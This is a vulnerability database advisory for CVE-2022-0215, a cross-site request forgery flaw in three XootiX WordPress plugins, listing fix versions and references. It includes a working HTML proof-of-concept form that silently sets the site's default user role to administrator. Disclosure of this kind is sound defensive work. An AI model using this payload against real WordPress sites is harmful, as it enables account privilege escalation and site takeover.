XootiX Plugins – Various Versions CSRF to Arbitrary Options Update | CVE 2022-0215 | Plugin Vulnerabilities

Description

The plugins Login/Signup Popup, Side Cart Woocommerce, and Waitlist Woocommerce are all vulnerable to cross-site request forgery due to a missing nonce check that would make it possible for attackers to update arbitrary options on a vulnerable WordPress site.

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="form" value="default&#95;role&#61;administrator" />
      <input type="hidden" name="action" value="xoo&#95;admin&#95;settings&#95;save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

easy-login-woocommerce

Fixed in 2.3

waitlist-woocommerce

Fixed in 2.5.1

side-cart-woocommerce

Fixed in 2.1

References

CVE

URL

https://www.wordfence.com/blog/2022/01/84000-wordpress-sites-affected-by-three-plugins-with-the-same-vulnerability/

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Chloe Chamberland

Submitter

Chloe Chamberland

Submitter website

https://wordfence.com

Submitter twitter

Verified

Yes

WPVDB ID

35a5247d-b599-4d95-9f08-1324c870f9d2

Timeline

Publicly Published

2022-01-13 (about 4 years ago)

Added

2022-01-13 (about 4 years ago)

Last Updated

2022-04-13 (about 3 years ago)

Other

Published

Title

Published

2020-09-26

Title

Hueman < 3.6.4 - Arbitrary Settings Update via CSRF

Published

2025-09-26

Title

cForms – Light speed fast Form Builder <= 3.0.0 - Cross-Site Request Forgery

Published

2025-09-10

Title

Blog Designer For Elementor – Post Slider, Post Carousel, Post Grid <= 1.1.7 - Cross-Site Request Forgery

Published

2025-07-30

Title

Chartify < 3.5.4 - Cross-Site Request Forgery

Published

2023-12-27

Title

Inline Image Upload for BBPress < 1.1.19 - Cross-Site Request Forgery via hm_bbpui_admin_page